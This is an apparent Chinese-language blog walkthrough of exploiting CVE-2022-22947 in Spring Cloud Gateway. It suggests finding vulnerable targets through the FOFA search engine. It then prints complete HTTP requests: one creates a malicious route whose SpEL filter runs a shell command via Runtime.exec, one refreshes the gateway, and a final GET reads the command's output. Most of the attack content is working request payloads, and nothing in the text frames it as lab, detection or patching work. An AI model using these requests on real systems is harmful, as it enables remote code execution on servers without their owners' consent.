安全学又学不会，只能送送外卖补贴家用这样子

Spring仍在努力，今年3月爆发CVE-2022-22947代码执行漏洞将再次疯狂，fofa上一次搜一个准(搞笑)

一、信息收集

或者用老朋友的脚本扫描，看看目标网页是否存在Spring Boot信息泄露问题

首先要抓包/actuator/gateway/routes在目录下，创建包含恶意请求的路由信息，并将其放入目录Repeater。这里只能作为参考，根据环境变化进行实际操作，例如可能需要添加content-type，名字可以自由发挥，这里我用了test。

POST /actuator/gateway/routes/test HTTP/1.1 Host:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/json Content-Length: 309  {   "id": "test",  "filters": [{ "name": "AddResponseHeader", "args": {   "name": "Result",   "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls\"}).getInputStream()))}" }   }],   "uri": "http://example.com" }

如果能够正常创建，服务器要给回一个201状态的包，如果返回如图上的状态，证明创建成功，就可以进行下一步

创建成功后，可以简单地理解，我们构建的恶意代码已经躺在另一个服务器上，只需要刷新，访问页面可以触发我们的恶意代码，以下代码与刚刚创建的路由基本相同，只需要修改POST请求页面改为/actuaor/gateway/refresh，刷新信息

POST /actuator/gateway/refresh HTTP/1.1 Host:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/json Content-Length: 309  {   "id": "test",  "filters": [{ "name": "AddResponseHeader", "args": {   "name": "Result",   "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls\"}).getInputStream()))}" }   }],   "uri": "http://example.com" }

最后直接GET访问我们刚刚创建的路由，hostname:port/actuator/gateway/routes/创建路由的名称(我在这里用的是test）

完毕，下一个